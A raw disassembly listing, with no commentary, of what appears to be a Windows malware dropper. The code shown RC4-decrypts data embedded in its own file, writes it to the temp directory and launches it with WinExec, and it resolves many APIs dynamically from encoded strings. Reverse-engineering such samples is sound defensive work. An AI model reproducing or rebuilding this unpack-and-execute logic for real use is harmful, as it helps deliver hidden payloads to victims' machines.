mov fs:[eax], esp
mov eax, [ebp+arg_4]
call sub_40016B38
mov ebx, eax
cmp ebx, 4
jbe short loc_40016BD4
lea eax, [ebp+arg_4]
call sub_40004DA0
mov edi, eax
mov edx, [edi]
mov eax, esi
call sub_40004F74
cmp dword ptr [edi], 80000h
jbe short loc_40016B99
mov [ebp+var_8], 2
jmp short loc_40016BA0
; ---------------------------------------------------------------------------
loc_40016B99: ; CODE XREF: sub_40016B44+4A�j
mov [ebp+var_8], 102h
loc_40016BA0: ; CODE XREF: sub_40016B44+53�j
lea eax, [ebp+var_4]
push eax
sub ebx, 4
push ebx
lea eax, [ebp+arg_4]
call sub_40004DA0
add eax, 4
push eax
mov eax, [edi]
push eax
mov eax, esi
call sub_40004DA0
push eax
mov eax, [ebp+var_8]
push eax
call sub_40016B30 ; RtlDecompressBuffer
mov eax, esi
mov edx, [ebp+var_4]
call sub_40004F74
jmp short loc_40016BDB
; ---------------------------------------------------------------------------
loc_40016BD4: ; CODE XREF: sub_40016B44+2F�j
mov eax, esi
call sub_40004884
loc_40016BDB: ; CODE XREF: sub_40016B44+8E�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40016BF8
loc_40016BE8: ; CODE XREF: sub_40016B44+B2�j
lea eax, [ebp+arg_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_40016BF1: ; DATA XREF: sub_40016B44+17�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40016BE8
; ---------------------------------------------------------------------------
loc_40016BF8: ; CODE XREF: sub_40016B44+AC�j
; DATA XREF: sub_40016B44+9F�o
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn 8
sub_40016B44 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40016C04 proc near ; CODE XREF: .itext:400197CE�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push ebx
push esi
push edi
xor eax, eax
mov [ebp+var_10], eax
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
call sub_40004D38
xor eax, eax
push ebp
push offset loc_40016CCD
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, esi
call sub_40004884
mov eax, [ebp+arg_4]
call sub_40016B38
mov [ebp+var_8], eax
mov edi, 1
cmp edi, [ebp+var_8]
ja short loc_40016CAF
loc_40016C47: ; CODE XREF: sub_40016C04+A9�j
mov eax, [ebp+arg_4]
movzx ebx, byte ptr [eax+edi-1]
test bl, bl
jnz short loc_40016C8F
mov eax, [ebp+arg_4]
movzx eax, byte ptr [eax+edi]
mov [ebp+var_1], al
mov eax, [esi]
call sub_40016B38
mov [ebp+var_C], eax
movzx edx, [ebp+var_1]
add edx, [ebp+var_C]
mov eax, esi
call sub_40004F74
mov eax, esi
call sub_40004DA0
mov edx, [ebp+var_C]
add eax, edx
movzx edx, [ebp+var_1]
xor ecx, ecx
call sub_40003580
inc edi
jmp short loc_40016CA9
; ---------------------------------------------------------------------------
loc_40016C8F: ; CODE XREF: sub_40016C04+4D�j
lea eax, [ebp+var_10]
mov edx, [ebp+arg_4]
movzx edx, byte ptr [edx+edi-1]
call sub_40004A6C
mov edx, [ebp+var_10]
mov eax, esi
call sub_40004B50
loc_40016CA9: ; CODE XREF: sub_40016C04+89�j
inc edi
cmp edi, [ebp+var_8]
jbe short loc_40016C47
loc_40016CAF: ; CODE XREF: sub_40016C04+41�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40016CD4
loc_40016CBC: ; CODE XREF: sub_40016C04+CE�j
lea eax, [ebp+var_10]
call sub_40004884
lea eax, [ebp+arg_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_40016CCD: ; DATA XREF: sub_40016C04+1C�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40016CBC
; ---------------------------------------------------------------------------
loc_40016CD4: ; CODE XREF: sub_40016C04+C8�j
; DATA XREF: sub_40016C04+B3�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
sub_40016C04 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40016CE0 proc near ; CODE XREF: .itext:40019A90�p
jmp ds:dword_40024670
sub_40016CE0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40016CE8 proc near ; CODE XREF: sub_40017374+41�p
; .itext:40019606�p ...
var_104 = byte ptr -104h
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFEFCh
push ebx
push esi
xor ecx, ecx
mov [ebp+var_4], ecx
mov esi, edx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_40016D45
push dword ptr fs:[eax]
mov fs:[eax], esp
lea edx, [ebp+var_104]
mov eax, ebx
call sub_40003790
lea edx, [ebp+var_104]
lea eax, [ebp+var_4]
call sub_40004AE8
mov eax, esi
mov edx, [ebp+var_4]
call sub_400048D8
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40016D4C
loc_40016D3C: ; CODE XREF: sub_40016CE8+62�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_40016D45: ; DATA XREF: sub_40016CE8+17�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40016D3C
; ---------------------------------------------------------------------------
loc_40016D4C: ; CODE XREF: sub_40016CE8+5C�j
; DATA XREF: sub_40016CE8+4F�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40016CE8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40016D54 proc near ; CODE XREF: sub_40016D80+B4�p
; sub_40016D80+FB�p
push ecx
mov edx, esp
call sub_4000379C
pop edx
retn
sub_40016D54 endp
; ---------------------------------------------------------------------------
align 10h
off_40016D60 dd offset dword_40016D64 ; DATA XREF: sub_40016D80+7D�r
; sub_40016D80+12E�r ...
dword_40016D64 dd 312E0211h, 4 dd offset off_40001000
dd 48h
dd offset off_40001000
dd 75745304h, 408D62h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40016D80 proc near ; CODE XREF: .itext:4001979C�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
xor ecx, ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_10], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_40004D38
xor eax, eax
push ebp
push offset loc_40016F53
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+var_8]
mov edx, [ebp+var_4]
call sub_4000491C
loc_40016DB5: ; CODE XREF: sub_40016D80+60�j
mov edx, [ebp+var_8]
mov eax, offset dword_40016F6C
call sub_40004E30
mov ecx, eax
lea eax, [ebp+var_8]
mov edx, 1
call sub_40004DE8
mov edx, [ebp+var_8]
mov eax, offset dword_40016F6C
call sub_40004E30
test eax, eax
jg short loc_40016DB5
xor edi, edi
lea eax, [ebp+var_C]
xor ecx, ecx
mov edx, 4
call sub_40003580
push 1
lea eax, [ebp+var_C]
mov ecx, 1
mov edx, ds:off_40016D60
call sub_40005B28
add esp, 4
jmp loc_40016EE1
; ---------------------------------------------------------------------------
loc_40016E10: ; CODE XREF: sub_40016D80+170�j
lea eax, [ebp+var_14]
push eax
mov edx, [ebp+var_8]
mov eax, offset dword_40016F78
call sub_40004E30
mov ecx, eax
dec ecx
mov edx, 1
mov eax, [ebp+var_8]
call sub_40004DA8
mov eax, [ebp+var_14]
call sub_40016D54
mov ebx, eax
mov edx, [ebp+var_8]
mov eax, offset dword_40016F78
call sub_40004E30
mov ecx, eax
lea eax, [ebp+var_8]
mov edx, 1
call sub_40004DE8
lea eax, [ebp+var_18]
push eax
mov edx, [ebp+var_8]
mov eax, offset dword_40016F84
call sub_40004E30
mov ecx, eax
dec ecx
mov edx, 1
mov eax, [ebp+var_8]
call sub_40004DA8
mov eax, [ebp+var_18]
call sub_40016D54
mov esi, eax
mov edx, [ebp+var_8]
mov eax, offset dword_40016F84
call sub_40004E30
mov ecx, eax
lea eax, [ebp+var_8]
mov edx, 1
call sub_40004DE8
cmp edi, ebx
jg short loc_40016EBC
lea edi, [ebx+1]
push edi
lea eax, [ebp+var_C]
mov ecx, 1
mov edx, ds:off_40016D60
call sub_40005B28
add esp, 4
loc_40016EBC: ; CODE XREF: sub_40016D80+120�j
mov eax, [ebp+var_C]
lea eax, [eax+ebx*4]
push eax
mov ecx, esi
mov edx, 1
mov eax, [ebp+var_4]
call sub_40004DA8
lea eax, [ebp+var_4]
mov ecx, esi
mov edx, 1
call sub_40004DE8
loc_40016EE1: ; CODE XREF: sub_40016D80+8B�j
mov edx, [ebp+var_8]
mov eax, offset dword_40016F84
call sub_40004E30
test eax, eax
jg loc_40016E10
mov eax, [ebp+var_10]
call sub_40004884
mov ebx, edi
dec ebx
test ebx, ebx
jl short loc_40016F1D
inc ebx
xor esi, esi
loc_40016F08: ; CODE XREF: sub_40016D80+19B�j
mov eax, [ebp+var_10]
mov edx, [ebp+var_C]
mov edx, [edx+esi*4]
call sub_40004B50
mov eax, [ebp+var_10]
inc esi
dec ebx
jnz short loc_40016F08
loc_40016F1D: ; CODE XREF: sub_40016D80+183�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40016F5A
loc_40016F2A: ; CODE XREF: sub_40016D80+1D8�j
lea eax, [ebp+var_18]
mov edx, 2
call sub_400048A8
lea eax, [ebp+var_C]
mov edx, ds:off_40016D60
call sub_40005B34
lea eax, [ebp+var_8]
mov edx, 2
call sub_400048A8
retn
; ---------------------------------------------------------------------------
loc_40016F53: ; DATA XREF: sub_40016D80+1F�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40016F2A
; ---------------------------------------------------------------------------
loc_40016F5A: ; CODE XREF: sub_40016D80+1D2�j
; DATA XREF: sub_40016D80+1A5�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40016D80 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 1
dword_40016F6C dd 1, 0FFFFFFFFh, 1 ; sub_40016D80+54�o
dword_40016F78 dd 3Ah, 0FFFFFFFFh, 1 ; sub_40016D80+BE�o
dword_40016F84 dd 3Bh ; sub_40016D80+105�o ...
; =============== S U B R O U T I N E =======================================
sub_40016F88 proc near ; CODE XREF: .itext:4001959B�p
; .itext:4001970C�p
push ebx
push esi
mov esi, eax
push 0Ah
push edx
mov eax, ds:dword_4001E7F8
push eax
call sub_40006538 ; FindResourceA
mov ebx, eax
push ebx
mov eax, ds:dword_4001E7F8
push eax
call sub_40006638 ; SizeofResource
mov [esi], eax
push ebx
mov eax, ds:dword_4001E7F8
push eax
call sub_400065F8 ; LoadResource
mov ebx, eax
push ebx
call sub_40006600 ; SetHandleCount
mov esi, eax
test esi, esi
jz short loc_40016FCC
push ebx
call sub_40006550 ; FreeResource
jmp short loc_40016FD3
; ---------------------------------------------------------------------------
loc_40016FCC: ; CODE XREF: sub_40016F88+3A�j
push 0
call sub_40006530 ; ExitProcess
loc_40016FD3: ; CODE XREF: sub_40016F88+42�j
mov eax, esi
pop esi
pop ebx
retn
sub_40016F88 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40016FD8 proc near ; CODE XREF: sub_400171BC+44�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov ecx, edx
test ecx, ecx
js short loc_40016FF1
shr ecx, 2
loc_40016FEA: ; CODE XREF: sub_40016FD8+17�j
mov ebx, [eax+ecx*4]
dec ecx
push ebx
jns short loc_40016FEA
loc_40016FF1: ; CODE XREF: sub_40016FD8+D�j
mov eax, esp
mov [ebp+var_4], eax
xor eax, eax
mov [ebp+var_8], eax
lea edi, [edx+1]
xor ecx, ecx
mov ebx, offset dword_4001F3C8
mov esi, offset byte_4001F4C8
loc_4001700A: ; CODE XREF: sub_40016FD8+4C�j
mov eax, ecx
cdq
idiv edi
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax+edx+1]
mov [ebx], al
mov [esi], cl
inc ecx
inc esi
inc ebx
cmp ecx, 100h
jnz short loc_4001700A
mov ecx, 100h
mov eax, offset byte_4001F4C8
mov edx, offset dword_4001F3C8
loc_40017035: ; CODE XREF: sub_40016FD8+99�j
movzx ebx, byte ptr [eax]
mov esi, ebx
add esi, [ebp+var_8]
movzx edi, byte ptr [edx]
add esi, edi
and esi, 800000FFh
jns short loc_40017052
dec esi
or esi, 0FFFFFF00h
inc esi
loc_40017052: ; CODE XREF: sub_40016FD8+70�j
mov [ebp+var_8], esi
mov esi, ebx
mov ebx, [ebp+var_8]
movzx ebx, ds:byte_4001F4C8[ebx]
mov [eax], bl
mov ebx, esi
mov esi, [ebp+var_8]
mov ds:byte_4001F4C8[esi], bl
inc edx
inc eax
dec ecx
jnz short loc_40017035
mov edi, [ebp+var_14]
mov esi, [ebp+var_10]
mov ebx, [ebp+var_C]
mov esp, ebp
pop ebp
retn
sub_40016FD8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40017080 proc near ; CODE XREF: sub_400171BC+145�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push ebx
push esi
push edi
mov ebx, edx
test ebx, ebx
js short loc_40017099
shr ebx, 2
loc_40017092: ; CODE XREF: sub_40017080+17�j
mov esi, [eax+ebx*4]
dec ebx
push esi
jns short loc_40017092
loc_40017099: ; CODE XREF: sub_40017080+D�j
mov eax, esp
mov [ebp+var_4], ecx
xor esi, esi
xor ecx, ecx
inc edx
test edx, edx
jl short loc_40017124
inc edx
mov [ebp+var_10], edx
mov edx, [ebp+var_4]
loc_400170AE: ; CODE XREF: sub_40017080+A2�j
inc esi
and esi, 800000FFh
jns short loc_400170BF
dec esi
or esi, 0FFFFFF00h
inc esi
loc_400170BF: ; CODE XREF: sub_40017080+35�j
movzx ebx, ds:byte_4001F4C8[esi]
add ecx, ebx
and ecx, 800000FFh
jns short loc_400170D8
dec ecx
or ecx, 0FFFFFF00h
inc ecx
loc_400170D8: ; CODE XREF: sub_40017080+4E�j
mov [ebp+var_C], ebx
movzx ebx, ds:byte_4001F4C8[ecx]
mov ds:byte_4001F4C8[esi], bl
movzx ebx, byte ptr [ebp+var_C]
mov ds:byte_4001F4C8[ecx], bl
movzx ebx, ds:byte_4001F4C8[esi]
movzx edi, ds:byte_4001F4C8[ecx]
add ebx, edi
and ebx, 0FFh
movzx ebx, ds:byte_4001F4C8[ebx]
movzx edi, byte ptr [eax]
xor ebx, edi
mov [ebp+var_8], ebx
movzx ebx, byte ptr [ebp+var_8]
mov [edx], bl
inc edx
inc eax
dec [ebp+var_10]
jnz short loc_400170AE
loc_40017124: ; CODE XREF: sub_40017080+25�j
mov edi, [ebp+var_1C]
mov esi, [ebp+var_18]
mov ebx, [ebp+var_14]
mov esp, ebp
pop ebp
retn 4
sub_40017080 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40017134 proc near ; CODE XREF: sub_400171BC+94�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_40004D38
xor eax, eax
push ebp
push offset loc_400171A3
push dword ptr fs:[eax]
mov fs:[eax], esp
jmp short loc_40017172
; ---------------------------------------------------------------------------
loc_40017156: ; CODE XREF: sub_40017134+4D�j
mov edx, [ebp+var_4]
mov eax, offset dword_400171B8
call sub_40004E30
mov ecx, eax
lea eax, [ebp+var_4]
mov edx, 1
call sub_40004DE8
loc_40017172: ; CODE XREF: sub_40017134+20�j
mov edx, [ebp+var_4]
mov eax, offset dword_400171B8
call sub_40004E30
test eax, eax
jnz short loc_40017156
mov eax, ebx
mov edx, [ebp+var_4]
call sub_400048D8
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_400171AA
loc_4001719A: ; CODE XREF: sub_40017134+74�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_400171A3: ; DATA XREF: sub_40017134+15�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4001719A
; ---------------------------------------------------------------------------
loc_400171AA: ; CODE XREF: sub_40017134+6E�j
; DATA XREF: sub_40017134+61�o
pop ebx
pop ecx
pop ebp
retn
sub_40017134 endp
; ---------------------------------------------------------------------------
align 10h
dd 0FFFFFFFFh, 1
dword_400171B8 dd 5Ch ; sub_40017134+41�o
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400171BC proc near ; CODE XREF: .itext:40019564�p
var_920 = dword ptr -920h
var_91C = dword ptr -91Ch
var_918 = dword ptr -918h
var_914 = dword ptr -914h
var_910 = dword ptr -910h
var_909 = byte ptr -909h
var_804 = byte ptr -804h
var_404 = byte ptr -404h
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFF6E0h
push ebx
push esi
push edi
xor eax, eax
mov [ebp+var_920], eax
mov [ebp+var_910], eax
mov [ebp+var_914], eax
mov [ebp+var_918], eax
mov [ebp+var_91C], eax
xor eax, eax
push ebp
push offset loc_40017358
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, offset dword_4001ADB8
mov edx, 0FFh
call sub_40016FD8
lea eax, [ebp+var_909]
push eax
push 105h
call sub_400065C0 ; GetTempPathA
lea eax, [ebp+var_914]
lea edx, [ebp+var_909]
mov ecx, 105h
call sub_40004AF4
push [ebp+var_914]
push offset dword_40017370
lea edx, [ebp+var_91C]
xor eax, eax
call sub_40002FF8
mov eax, [ebp+var_91C]
lea edx, [ebp+var_918]
call sub_40017134
push [ebp+var_918]
lea eax, [ebp+var_910]
mov edx, 3
call sub_40004C08
mov eax, [ebp+var_910]
call sub_40004D48
mov edi, eax
push 0
push 80h
push 3
push 0
push 1
push 80000000h
lea edx, [ebp+var_920]
xor eax, eax
call sub_40002FF8
mov eax, [ebp+var_920]
call sub_40004D48
push eax
call sub_40006510 ; CreateFileA
mov ebx, eax
push 0
push 0
push 3E00h
push ebx
call sub_40006630 ; SetFilePointer
push 0
push 80h
push 2
push 0
push 2
push 40000000h
push edi
call sub_40006510 ; CreateFileA
mov esi, eax
loc_400172D3: ; CODE XREF: sub_400171BC+168�j
push 0
lea eax, [ebp+var_4]
push eax
push 400h
lea eax, [ebp+var_404]
push eax
push ebx
call sub_40006618 ; ReadFile
push 3FFh
lea ecx, [ebp+var_804]
lea eax, [ebp+var_404]
mov edx, 3FFh
call sub_40017080
push 0
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
push eax
lea eax, [ebp+var_804]
push eax
push esi
call sub_40006660 ; WriteFile
cmp [ebp+var_4], 400h
jnb short loc_400172D3
push ebx
call sub_400064F0 ; CloseHandle
push esi
call sub_400064F0 ; CloseHandle
push 0
push edi
call sub_40006658 ; WinExec
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4001735F
loc_40017347: ; CODE XREF: sub_400171BC+1A1�j
lea eax, [ebp+var_920]
mov edx, 5
call sub_400048A8
retn
; ---------------------------------------------------------------------------
loc_40017358: ; DATA XREF: sub_400171BC+2F�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40017347
; ---------------------------------------------------------------------------
loc_4001735F: ; CODE XREF: sub_400171BC+19B�j
; DATA XREF: sub_400171BC+186�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_400171BC endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 1
dword_40017370 dd 5Ch
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40017374 proc near ; CODE XREF: sub_400173FC+2D�p
; sub_400173FC+4A�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
xor ecx, ecx
mov [ebp+var_8], ecx
mov esi, edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_40004D38
xor eax, eax
push ebp
push offset loc_400173ED
push dword ptr fs:[eax]
mov fs:[eax], esp
mov ebx, [ebp+var_4]
test ebx, ebx
jz short loc_400173A8
sub ebx, 4
mov ebx, [ebx]
loc_400173A8: ; CODE XREF: sub_40017374+2D�j
push 0
push 0Ah
push 0
push 14h
lea edx, [ebp+var_8]
mov eax, ebx
call sub_40016CE8
mov edx, [ebp+var_8]
lea ecx, [ebp+var_4]
mov eax, [ebp+var_4]
call sub_40006A2C
mov eax, esi
mov edx, [ebp+var_4]
call sub_400048D8
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_400173F4
loc_400173DF: ; CODE XREF: sub_40017374+7E�j
lea eax, [ebp+var_8]
mov edx, 2
call sub_400048A8
retn
; ---------------------------------------------------------------------------
loc_400173ED: ; DATA XREF: sub_40017374+1D�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_400173DF
; ---------------------------------------------------------------------------
loc_400173F4: ; CODE XREF: sub_40017374+78�j
; DATA XREF: sub_40017374+66�o
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_40017374 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400173FC proc near ; CODE XREF: .itext:40019569�p
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov ecx, 0Ah
loc_40017404: ; CODE XREF: sub_400173FC+D�j
push 0
push 0
dec ecx
jnz short loc_40017404
push ecx
push ebx
push esi
mov esi, offset dword_4001F3B0
xor eax, eax
push ebp
push offset loc_400176B8
push dword ptr fs:[eax]
mov fs:[eax], esp
lea edx, [ebp+var_4]
mov eax, offset dword_400176D0
call sub_40017374
mov eax, [ebp+var_4]
call sub_40004D48
push eax
call sub_400065F0 ; LoadLibraryA
mov ebx, eax
lea edx, [ebp+var_8]
mov eax, offset dword_400176E4
call sub_40017374
mov eax, [ebp+var_8]
call sub_40004D48
push eax
push ebx
call sub_400065A8 ; GetProcAddress
mov [esi], eax
lea edx, [ebp+var_C]
mov eax, offset dword_400176FC
call sub_40017374
mov eax, [ebp+var_C]
call sub_40004D48
push eax
push ebx
call dword ptr [esi]
mov ds:dword_4001F3B4, eax
lea edx, [ebp+var_10]
mov eax, offset dword_40017710
call sub_40017374
mov eax, [ebp+var_10]
call sub_40004D48
push eax
push ebx
call dword ptr [esi]
mov ds:dword_4001F3B8, eax
lea edx, [ebp+var_14]
mov eax, offset dword_40017728
call sub_40017374
mov eax, [ebp+var_14]
call sub_40004D48
push eax
push ebx
call dword ptr [esi]
mov ds:dword_4001F3BC, eax
lea edx, [ebp+var_18]
mov eax, offset dword_4001773C
call sub_40017374
mov eax, [ebp+var_18]
call sub_40004D48
push eax
push ebx
call dword ptr [esi]
mov ds:dword_4001F3C0, eax
lea edx, [ebp+var_1C]
mov eax, offset dword_40017750
call sub_40017374
mov eax, [ebp+var_1C]
call sub_40004D48
push eax
push ebx
call dword ptr [esi]
mov ds:dword_4001F3C4, eax
lea edx, [ebp+var_20]
mov eax, offset dword_40017764
call sub_40017374
mov eax, [ebp+var_20]
call sub_40004D48
push eax
push ebx
call dword ptr [esi]
mov ds:dword_4001F378, eax
lea edx, [ebp+var_24]
mov eax, offset dword_4001777C
call sub_40017374
mov eax, [ebp+var_24]
call sub_40004D48
push eax
push ebx
call dword ptr [esi]
mov ds:dword_4001F37C, eax
lea edx, [ebp+var_28]
mov eax, offset dword_40017798
call sub_40017374
mov eax, [ebp+var_28]
call sub_40004D48
push eax
push ebx
call dword ptr [esi]
mov ds:dword_4001F384, eax
lea edx, [ebp+var_2C]
mov eax, offset dword_400177B4
call sub_40017374
mov eax, [ebp+var_2C]
call sub_40004D48
push eax
push ebx
call dword ptr [esi]
mov ds:dword_4001F388, eax
lea edx, [ebp+var_30]
mov eax, offset dword_400177D0
call sub_40017374
mov eax, [ebp+var_30]
call sub_40004D48
push eax
push ebx
call dword ptr [esi]
mov ds:dword_4001F38C, eax
lea edx, [ebp+var_34]
mov eax, offset dword_400177E8
call sub_40017374
mov eax, [ebp+var_34]
call sub_40004D48
push eax
push ebx
call dword ptr [esi]
mov ds:dword_4001F394, eax
lea edx, [ebp+var_38]
mov eax, offset dword_40017800
call sub_40017374
mov eax, [ebp+var_38]
call sub_40004D48
push eax
push ebx
call dword ptr [esi]
mov ds:dword_4001F398, eax
lea edx, [ebp+var_3C]
mov eax, offset dword_40017818
call sub_40017374
mov eax, [ebp+var_3C]
call sub_40004D48
push eax
push ebx
call dword ptr [esi]
mov ds:dword_4001F39C, eax
lea edx, [ebp+var_40]
mov eax, offset dword_40017830
call sub_40017374
mov eax, [ebp+var_40]
call sub_40004D48
push eax
push ebx
call dword ptr [esi]
mov ds:dword_4001F3A0, eax
lea edx, [ebp+var_44]
mov eax, offset dword_40017848
call sub_40017374
mov eax, [ebp+var_44]
call sub_40004D48
push eax
push ebx
call dword ptr [esi]
mov ds:dword_4001F3A4, eax
lea edx, [ebp+var_48]
mov eax, offset dword_4001785C
call sub_40017374
mov eax, [ebp+var_48]
call sub_40004D48
push eax
push ebx
call dword ptr [esi]
mov ds:dword_4001F390, eax
lea edx, [ebp+var_4C]
mov eax, offset dword_40017874
call sub_40017374
mov eax, [ebp+var_4C]
call sub_40004D48
push eax
push ebx
call dword ptr [esi]
mov ds:dword_4001F3A8, eax
lea edx, [ebp+var_50]
mov eax, offset dword_40017890
call sub_40017374
mov eax, [ebp+var_50]
call sub_40004D48
push eax
push ebx
call dword ptr [esi]
mov ds:dword_4001F380, eax
lea edx, [ebp+var_54]
mov eax, offset dword_400178A8
call sub_40017374
mov eax, [ebp+var_54]
call sub_40004D48
push eax
push ebx
call dword ptr [esi]
mov ds:dword_4001F3AC, eax
push ebx
call ds:dword_4001F3A4 ; FreeLibrary
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_400176BF
loc_400176AA: ; CODE XREF: sub_400173FC+2C1�j
lea eax, [ebp+var_54]
mov edx, 15h
call sub_400048A8
retn
; ---------------------------------------------------------------------------
loc_400176B8: ; DATA XREF: sub_400173FC+1A�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_400176AA
; ---------------------------------------------------------------------------
loc_400176BF: ; CODE XREF: sub_400173FC+2BB�j
; DATA XREF: sub_400173FC+2A9�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_400173FC endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 8
dword_400176D0 dd 2B362609h, 7B7B2B23h, 0 dd 0FFFFFFFFh, 0Eh
dword_400176E4 dd 22051528h, 37161B01h, 0A0B1C13h, 203h, 0FFFFFFFFh, 0Bh
; DATA XREF: sub_400173FC+45�o
dword_400176FC dd 0E0B1F2Fh, 1A341404h, 371018h, 0FFFFFFFFh, 0Eh
; DATA XREF: sub_400173FC+63�o
dword_40017710 dd 3405153Ch, 2610181Ah, 1B171118h, 315h, 0FFFFFFFFh, 8
; DATA XREF: sub_400173FC+81�o
dword_40017728 dd 21252610h, 2C242E00h, 0 dd 0FFFFFFFFh, 0Bh
dword_4001773C dd 291A082Bh, 20171D19h, 130F1Dh, 0FFFFFFFFh, 0Bh
; DATA XREF: sub_400173FC+BD�o
dword_40017750 dd 1C01012Fh, 1D133915h, 131910h, 0FFFFFFFFh, 0Ch
; DATA XREF: sub_400173FC+DB�o
dword_40017764 dd 51C0B3Fh, 1C27171Ch, 9161307h, 0 dd 0FFFFFFFFh, 10h
dword_4001777C dd 20071722h, 1912041Dh, 1F14391Dh, 10C1606h, 0
; DATA XREF: sub_400173FC+117�o
dd 0FFFFFFFFh, 11h
dword_40017798 dd 11151620h, 1A170526h, 3F0F081Fh, 41A1916h, 0Eh, 0FFFFFFFFh
; DATA XREF: sub_400173FC+135�o
dd 10h
dword_400177B4 dd 20071736h, 1912041Dh, 1F14391Dh, 10C1606h, 0
; DATA XREF: sub_400173FC+153�o
dd 0FFFFFFFFh, 0Eh
dword_400177D0 dd 1314022Ch, 4251107h, 1C1C1B18h, 3003h, 0FFFFFFFFh, 0Dh
; DATA XREF: sub_400173FC+171�o
dword_400177E8 dd 151E0628h, 1A071620h, 0B1B0503h, 2Eh, 0FFFFFFFFh, 0Eh
